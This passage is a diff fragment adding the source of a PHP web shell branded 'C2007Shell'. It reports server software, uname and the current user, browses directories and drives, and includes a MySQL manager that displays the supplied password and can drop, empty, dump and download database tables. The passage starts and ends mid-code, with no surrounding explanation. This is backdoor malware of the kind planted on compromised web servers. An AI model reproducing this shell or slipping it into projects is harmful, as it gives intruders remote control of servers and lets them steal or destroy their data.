+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C2007Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p>
+    </center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?>
+    <h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
+    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="Adora" maxlength="64"></td><td><input type="password" name="sql_passwd" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
+   ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_tables($sql_db); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; 
+    $c = 0; 
+    while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} 
+    if (!$c) {echo "No tables found in database.";} 
+   } 
+  } 
+  else 
+  { 
+   ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php 
+   $result = mysql_list_dbs($sql_sock); 
+   if (!$result) {echo mysql_smarterror();} 
+   else 
+   { 
+    ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php 
+    $c = 0; 
+    $dbs = ""; 
+    while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} 
+    echo "<option value=\"\">Databases (".$c.")</option>"; 
+    echo $dbs; 
+   } 
+   ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php 
+  } 
+  //End left panel 
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; 
+  //Start center panel 
+  $diplay = TRUE; 
+  if ($sql_db) 
+  { 
+   if (!is_numeric($c)) {$c = 0;} 
+   if ($c == 0) {$c = "no";} 
+   echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; 
+   if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} 
+   echo "</b></center>"; 
+   $acts = array("","dump"); 
+   if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} 
+   elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} 
+   elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} 
+   elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} 
+   elseif ($sql_tbl_act == "insert") 
+   { 
+    if ($sql_tbl_insert_radio == 1) 
+    { 
+     $keys = ""; 
+     $akeys = array_keys($sql_tbl_insert); 
+     foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} 
+     if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} 
+     $values = ""; 
+     $i = 0; 
+     foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} 
+     if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} 
+     $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+    elseif ($sql_tbl_insert_radio == 2) 
+    { 
+     $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); 
+     $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; 
+     $result = mysql_query($sql_query) or print(mysql_smarterror()); 
+     $result = mysql_fetch_array($result, MYSQL_ASSOC); 
+     $sql_act = "query"; 
+     $sql_tbl_act = "browse"; 
+    } 
+   } 
+   if ($sql_act == "query") 
+   { 
+    echo "<hr size=\"1\" noshade>"; 
+    if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+    if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+    if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} 
+   } 
+   if (in_array($sql_act,$acts)) 
+   { 
+    ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>Dump DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php 
+    if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} 
+    if ($sql_act == "newtbl") 
+    { 
+     echo "<b>"; 
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; 
+    } 
+    else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} 
+   } 
+   elseif ($sql_act == "dump") 
+   { 
+    if (empty($submit)) 
+    { 
+     $diplay = FALSE; 
+     echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><b>SQL-Dump:</b><br><br>"; 
+     echo "<b>DB:</b>&nbsp;<input type=\"text\" name=\"sql_db\" value=\"".urlencode($sql_db)."\"><br><br>"; 
+     $v = join (";",$dmptbls); 
+     echo "<b>Only tables (explode \";\")&nbsp;<b><sup>1</sup></b>:</b>&nbsp;<input type=\"text\" name=\"dmptbls\" value=\"".htmlspecialchars($v)."\" size=\"".(strlen($v)+5)."\"><br><br>"; 
+     if ($dump_file) {$tmp = $dump_file;} 
+     else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} 
+     echo "<b>File:</b>&nbsp;<input type=\"text\" name=\"sql_dump_file\" value=\"".$tmp."\" size=\"".(strlen($tmp)+strlen($tmp) % 30)."\"><br><br>"; 
+     echo "<b>Download: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_download\" value=\"1\" checked><br><br>"; 
+     echo "<b>Save to file: </b>&nbsp;<input type=\"checkbox\" name=\"sql_dump_savetofile\" value=\"1\" checked>"; 
+     echo "<br><br><input type=\"submit\" name=\"submit\" value=\"Dump\"><br><br><b><sup>1</sup></b> - all, if empty"; 
+     echo "</form>"; 
+    } 
+    else 
+    { 
+     $diplay = TRUE; 
+     $set = array(); 
+     $set["sock"] = $sql_sock; 
+     $set["db"] = $sql_db; 
+     $dump_out = "download"; 
+     $set["print"] = 0; 
+     $set["nl2br"] = 0; 
+     $set[""] = 0; 
+     $set["file"] = $dump_file; 
+     $set["add_drop"] = TRUE; 
+     $set["onlytabs"] = array(); 
+     if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} 
+     $ret = mysql_dump($set); 
+     if ($sql_dump_download) 
+     { 
+      @ob_clean(); 
+      header("Content-type: application/octet-stream"); 
+      header("Content-length: ".strlen($ret)); 
+      header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); 
+      echo $ret; 
+      exit; 
+     } 
+     elseif ($sql_dump_savetofile) 
+     { 
+      $fp = fopen($sql_dump_file,"w"); 
+      if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} 
+      else 
+      { 
+       fwrite($fp,$ret); 
+       fclose($fp); 
+       echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; 
+      } 
+     } 
+     else {echo "<b>Dump: nothing to do!</b>";} 
+    } 
+   } 
+   if ($diplay) 
+   { 
+    if (!empty($sql_tbl)) 
+    { 
+     if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} 
+     $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); 
+     $count_row = mysql_fetch_array($count); 
+     mysql_free_result($count); 
+     $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); 
+     $tbl_struct_fields = array(); 
+     while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} 
+     if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} 
+     if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} 
+     if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} 
+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} 
+     $perpage = $sql_tbl_le - $sql_tbl_ls; 
+     if (!is_numeric($perpage)) {$perpage = 10;} 
+     $numpages = $count_row[0]/$perpage; 
+     $e = explode(" ",$sql_order); 
+     if (count($e) == 2) 
+     { 
+      if ($e[0] == "d") {$asc_desc = "DESC";} 
+      else {$asc_desc = "ASC";} 
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; 
+     } 
+     else {$v = "";} 
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; 
+     $result = mysql_query($query) or print(mysql_smarterror()); 
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; 
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} 
+     if ($sql_tbl_act == "insert") 
+     { 
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} 
+      if (!empty($sql_tbl_insert_radio)) 
+      { 
+
+      } 
+      else 
+      { 
+       echo "<br><br><b>Inserting row into table:</b><br>"; 
+       if (!empty($sql_tbl_insert_q)) 
+       { 
+        $sql_query = "SELECT * FROM `".$sql_tbl."`"; 
+        $sql_query .= " WHERE".$sql_tbl_insert_q; 
+        $sql_query .= " LIMIT 1;"; 
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); 
+        $values = mysql_fetch_assoc($result); 
+        mysql_free_result($result); 
+       } 
+       else {$values = array();} 
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; 
+       foreach ($tbl_struct_fields as $field) 
+       { 
+        $name = $field["Field"]; 
+        if (empty($sql_tbl_insert_q)) {$v = "";} 
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; 
+        $i++; 
+       } 
+       echo "</table><br>"; 
